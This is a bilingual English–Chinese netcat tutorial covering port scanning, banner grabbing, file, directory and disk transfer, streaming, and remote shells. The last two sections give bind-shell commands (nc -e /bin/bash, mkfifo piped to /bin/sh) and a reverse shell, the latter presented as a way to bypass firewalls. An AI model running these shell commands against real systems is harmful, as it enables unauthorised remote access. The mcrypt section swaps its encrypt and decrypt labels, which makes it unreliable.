linux ncat命令

netcat是網絡工具中的瑞士軍刀，它能經過TCP和UDP在網絡中讀寫數據。經過與其餘工具結合和重定向，你能夠在腳本中以多種方式使用它。使用netcat命令所能完成的事情使人驚訝。 netcat所作的就是在兩臺電腦之間創建連接並返回兩個數據流，在這以後所能作的事就看你的想像力了。你能創建一個服務器，傳輸文件，與朋友聊天，傳輸流媒體或者用它做爲其它協議的獨立客戶端。 下面是一些使用netcat的例子. [A(172.31.100.7) B(172.31.100.23)]
Linux netcat command examples 1. Port scanning Port scanning is done by system admin and hackers to find the open ports at some machine. It helps them to identify the venerability in the system. $nc -z -v -n 172.31.100.7 21-25 It can work in both TCP and UDP mode, default is TCP mode, to change to udp use -u option z option tell netcat to use zero IO .i.e the connection is closed as soon as it opens and no actual data exchange take place. v option is used for verbose option. n option tell netcat not to use the DNS lookup for the address. This command will print all the open ports between 21 to 25. Banner is a text that services sends when you connects to them. Banner are very usefull when you are trying to velberability in the system as it identify the type and version of the services. NOTE not all services may send banner. Once You have found the open ports you can easily grab the service banner by connecting to them using netcat. $ nc -v 172.31.100.7 21 The Linux netcat command will connect to open port 21 and will print the banner of the service running at that port.	譯者信息 Linux netcat 命令實例： 1，端口掃描 端口掃描常常被系統管理員和黑客用來發如今一些機器上開放的端口，幫助他們識別系統中的漏洞。 $nc -z -v -n 172.31.100.7 21-25 能夠運行在TCP或者UDP模式，默認是TCP，-u參數調整爲udp. z 參數告訴netcat使用0 IO,鏈接成功後當即關閉鏈接， 不進行數據交換(謝謝@jxing 指點) v 參數指使用冗餘選項（譯者注：即詳細輸出） n 參數告訴netcat 不要使用DNS反向查詢IP地址的域名 這個命令會打印21到25 全部開放的端口。Banner是一個文本，Banner是一個你鏈接的服務發送給你的文本信息。當你試圖鑑別漏洞或者服務的類型和版本的時候，Banner信息是很是有用的。可是，並非全部的服務都會發送banner。 一旦你發現開放的端口，你能夠容易的使用netcat 鏈接服務抓取他們的banner。 $ nc -v 172.31.100.7 21 netcat 命令會鏈接開放端口21而且打印運行在這個端口上服務的banner信息。
2. Chat Server If you want to chat with your friend there are numerous software and messenger services available at your disposal.But what if you do not have that luxury anymore like inside your computer lab, where all outside connections are restricted, how will you communicate to your friend who is sitting in the next room. Don’t worry my friend because netcat has a solution for you just create a chat server and a predetermined port and he can connects to you. Server $nc -l 1567 The Linux netcat command starts a tcp server at port 1567 with stdout and stdin for input output stream i.e. The output is displayed at the shell and input is read from shell. Client $nc 172.31.100.7 1567 After this whatever you type on machine B will appear on A and vice-versa.	譯者信息 Chat Server 假如你想和你的朋友聊聊，有不少的軟件和信息服務能夠供你使用。可是，若是你沒有這麼奢侈的配置，好比你在計算機實驗室，全部的對外的鏈接都是被限制的，你怎樣和成天坐在隔壁房間的朋友溝通那？不要鬱悶了，netcat提供了這樣一種方法，你只須要建立一個Chat服務器，一個預先肯定好的端口，這樣子他就能夠聯繫到你了。 Server $nc -l 1567 netcat 命令在1567端口啓動了一個tcp 服務器，全部的標準輸出和輸入會輸出到該端口。輸出和輸入都在此shell中展現。 Client $nc 172.31.100.7 1567 無論你在機器B上鍵入什麼都會出如今機器A上。
3. File transfer Most of the time we are trying to transfer file over network and stumble upon the problem which tool to use. There are again numerous methods available like FTP, SCP, SMB etc. But is it really worth the effort to install and configure such complicated software and create a sever at your machine when you only need to transfer one file and only once. Suppose you want to transfer a file 「file.txt」 from A to B Anyone can be server or client, lets make A as server and B as client. Server $nc -l 1567 < file.txt Client $nc -n 172.31.100.7 1567 > file.txt Here we have created a server at A at redirected the netcat input from file file.txt, So when any connection is successfull the netcat send the content of the file. Again at the client we have redirect the output of netcat to file.txt. When B connects to A , A sends the file content and B save that content to file file.txt. It is not necessary do create the source of file as server we can work in the eopposeit order also. Like in the below case we are sending file from B to A but server is created at A. This time we only need to redirect ouput of netcat at to file and input at B from file. B as server Server $nc -l 1567 > file.txt Client $nc 172.31.100.23 1567 < file.txt	譯者信息 3，文件傳輸 大部分時間中，咱們都在試圖經過網絡或者其餘工具傳輸文件。有不少種方法，好比FTP,SCP,SMB等等，可是當你只是須要臨時或者一次傳輸文件，真的值得浪費時間來安裝配置一個軟件到你的機器上嘛。假設，你想要傳一個文件file.txt 從A 到B。A或者B均可以做爲服務器或者客戶端，如下，讓A做爲服務器，B爲客戶端。 Server $nc -l 1567 < file.txt Client $nc -n 172.31.100.7 1567 > file.txt 這裏咱們建立了一個服務器在A上而且重定向netcat的輸入爲文件file.txt，那麼當任何成功鏈接到該端口，netcat會發送file的文件內容。 在客戶端咱們重定向輸出到file.txt，當B鏈接到A，A發送文件內容，B保存文件內容到file.txt. 沒有必要建立文件源做爲Server，咱們也能夠相反的方法使用。像下面的咱們發送文件從B到A，可是服務器建立在A上，此次咱們僅須要重定向netcat的輸出而且重定向B的輸入文件。 B做爲Server Server $nc -l 1567 > file.txt Client nc 172.31.100.23 1567 < file.txt
4. Directory transfer Sending file is easy but what if we want to send more than one files, or a whole directory, its easy just use archive tool tar to archive the files first and then send this archive. Suppose you want to transfer a directory over the network from A to B. Server $tar -cvf – dir_name | nc -l 1567 Client $nc -n 172.31.100.7 1567 | tar -xvf - Here at server A we are creating the tar archive and redirecting its outout at the console through -. Then we are piping it to netcat which is used to send it over network. At Client we are just downloading the archive file from the server using the netcat and piping its output tar tool to extract the files. Want to conserve bandwidth by compressing the archive, we can use bzip2 or other tool specific to content of files. Server $tar -cvf – dir_name| bzip2 -z | nc -l 1567 Compress the archive using the bzip2 utility. Client $nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf - Decompress the archive using bzip2 archive	譯者信息 4，目錄傳輸 發送一個文件很簡單，可是若是咱們想要發送多個文件，或者整個目錄，同樣很簡單，只須要使用壓縮工具tar，壓縮後發送壓縮包。 若是你想要經過網絡傳輸一個目錄從A到B。 Server $tar -cvf – dir_name | nc -l 1567 Client   $nc -n 172.31.100.7 1567 | tar -xvf - 這裏在A服務器上，咱們建立一個tar歸檔包而且經過-在控制檯重定向它，而後使用管道，重定向給netcat，netcat能夠經過網絡發送它。 在客戶端咱們下載該壓縮包經過netcat 管道而後打開文件。 若是想要節省帶寬傳輸壓縮包，咱們可使用bzip2或者其餘工具壓縮。 Server   $tar -cvf – dir_name| bzip2 -z | nc -l 1567 經過bzip2壓縮 Client   $nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf - 使用bzip2解壓
5. Encrypt your data when sending over the network If you are worried about the security of data being sent over the network you can encrypt your data before sending using some tool like mcrypt. Server $nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt Encrypt the data using the mcrypt tool. Client $mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567 Decrypt the data using the mcrypt tool. Both the above commands will propmt for passowrd make sure to use the same password on both. Here we have used mcrypt for encryption but any tool can be used.	譯者信息 5. 加密你經過網絡發送的數據 若是你擔憂你在網絡上發送數據的安全，你能夠在發送你的數據以前用如mcrypt的工具加密。 服務端 $nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt 使用mcrypt工具加密數據。 客戶端 $mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567 使用mcrypt工具解密數據。 以上兩個命令會提示須要密碼，確保兩端使用相同的密碼。 這裏咱們是使用mcrypt用來加密，使用其它任意加密工具均可以。
6. Stream a video Not the best method to stream but if the server doesn’t have the specific tools, then with netcat we still have hope. Server $cat video.avi | nc -l 1567 Here we are just reading the video file and redirecting its output to netcat Client $nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 - Here we are reading the data from the socket and redirecting it to mplayer.	譯者信息 6. 流視頻 雖然不是生成流視頻的最好方法，但若是服務器上沒有特定的工具，使用netcat，咱們仍然有但願作成這件事。 服務端 $cat video.avi | nc -l 1567 這裏咱們只是從一個視頻文件中讀入並重定向輸出到netcat客戶端 $nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 - 這裏咱們從socket中讀入數據並重定向到mplayer。
7. Cloning a device If you have just installed and configured a Linux machine and have to do the same to other machine too and do not want to do the configuration again. No need to repeat the process just boot the other machine with some boot-able pen drive and clone you machine. Cloning a linux PC is very simple. Suppose your system disk is /dev/sda Server $dd if=/dev/sda | nc -l 1567 Client $nc -n 172.31.100.7 1567 | dd of=/dev/sda dd is a tool which reads the raw data from the disk, we are just redirecting its output stream through a netcat server to the other machine and writing it to the disk, it will copy everything along with the partition table. But if we have already done the partition and need to move only the root partition we can change sda with sda1, sda2 etc depending where out root is installed.	譯者信息 7，克隆一個設備 若是你已經安裝配置一臺Linux機器而且須要重複一樣的操做對其餘的機器，而你不想在重複配置一遍。不在須要重複配置安裝的過程，只啓動另外一臺機器的一些引導能夠隨身碟和克隆你的機器。 克隆Linux PC很簡單，假如你的系統在磁盤/dev/sda上 Server $dd if=/dev/sda | nc -l 1567 Client $nc -n 172.31.100.7 1567 | dd of=/dev/sda dd是一個從磁盤讀取原始數據的工具，我經過netcat服務器重定向它的輸出流到其餘機器而且寫入到磁盤中，它會隨着分區表拷貝全部的信息。可是若是咱們已經作過度區而且只須要克隆root分區，咱們能夠根據咱們系統root分區的位置，更改sda 爲sda1，sda2.等等。
8. Opening a shell We have used remote Shell using the telnet and ssh but what if they are not installed and we do not have the permission to install them, then we can create remote shell using netcat also. If your netcat support -c and -e option (traditional netcat) Server $nc -l 1567 -e /bin/bash -i Client $nc 172.31.100.7 1567 Here we have created a netcat server and indicated it to run /bin/bash command when connection is successful. If netcat doesn’t support -c or -e options(openbsd netcat) we can still crate remote shell. Server $mkfifo /tmp/tmp_fifo $cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo Here we have created a fifo. Then we have piped the content of this fifo file using pipe command to a shell 2>&1 is used to redirect stderr to same file where stdout is redirected which is piped to netcat server running at port 1567. Now here again we have redirected the output of netcat to fifo file. Explanation: The input received from network is written to fifo file. The fifo file is read by cat command and it content is sent to sh command. Sh command processes the received input and write it back to netcat. Netcat send the output over the network to client. All this is possible because pipe causes the command to run in parallel. The fifo file is used instead of regular file because the fifo causes the read to wait while if it was an ordinary file the cat command would have ended as soon as started reading an empty file. At client is just as simple as conecting to server Client $nc -n 172.31.100.7 1567 And you will get a shell prompt at the client	譯者信息 8，打開一個shell 咱們已經用過遠程shell-使用telnet和ssh，可是若是這兩個命令沒有安裝而且咱們沒有權限安裝他們，咱們也可使用netcat建立遠程shell。 假設你的netcat支持 -c -e 參數(默認 netcat) Server $nc -l 1567 -e /bin/bash -i Client $nc 172.31.100.7 1567 這裏咱們已經建立了一個netcat服務器而且表示當它鏈接成功時執行/bin/bash 假如netcat 不支持-c 或者 -e 參數（openbsd netcat）,咱們仍然可以建立遠程shell Server $mkfifo /tmp/tmp_fifo $cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo 這裏咱們建立了一個fifo文件，而後使用管道命令把這個fifo文件內容定向到shell 2>&1中。是用來重定向標準錯誤輸出和標準輸出，而後管道到netcat 運行的端口1567上。至此，咱們已經把netcat的輸出重定向到fifo文件中。 說明： 從網絡收到的輸入寫到fifo文件中 cat 命令讀取fifo文件而且其內容發送給sh命令 sh命令進程受到輸入並把它寫回到netcat。 netcat 經過網絡發送輸出到client 至於爲何會成功是由於管道使命令平行執行，fifo文件用來替代正常文件，由於fifo使讀取等待而若是是一個普通文件，cat命令會盡快結束並開始讀取空文件。 在客戶端僅僅簡單鏈接到服務器 Client $nc -n 172.31.100.7 1567 你會獲得一個shell提示符在客戶端
9. Reverse Shell Reverse shell are shell opened at the client side. Reverse shell are so named because unlike other configuration here server is using the services provided by the client. Server $nc -l 1567 At the client side simply tell netcat to execute the shell when connection is complete. Client $nc 172.31.100.7 1567 -e /bin/bash Now what is so special about reverse shell. Reverse shell is often used to bypass the firewall restrictions like blocked inbound connections. For example, I have a private IP address of 172.31.100.7 and I connect to outside network with a proxy server. If I want to access a shell at this machine from outside the network say 1.2.3.4, then I’ll use reverse shell for this purpose.	譯者信息 反向shell 反向shell是指在客戶端打開的shell。反向shell這樣命名是由於不一樣於其餘配置，這裏服務器使用的是由客戶提供的服務。 服務端 $nc -l 1567 在客戶端，簡單地告訴netcat在鏈接完成後，執行shell。 客戶端 $nc 172.31.100.7 1567 -e /bin/bash 如今，什麼是反向shell的特別之處呢   反向shell常常被用來繞過防火牆的限制，如阻止入站鏈接。例如，我有一個專用IP地址爲172.31.100.7，我使用代理服務器鏈接到外部網絡。若是我想從網絡外部訪問 這臺機器如1.2.3.4的shell，那麼我會用反向外殼用於這一目的。

轉載：https://www.oschina.net/translate/linux-netcat-command?cmp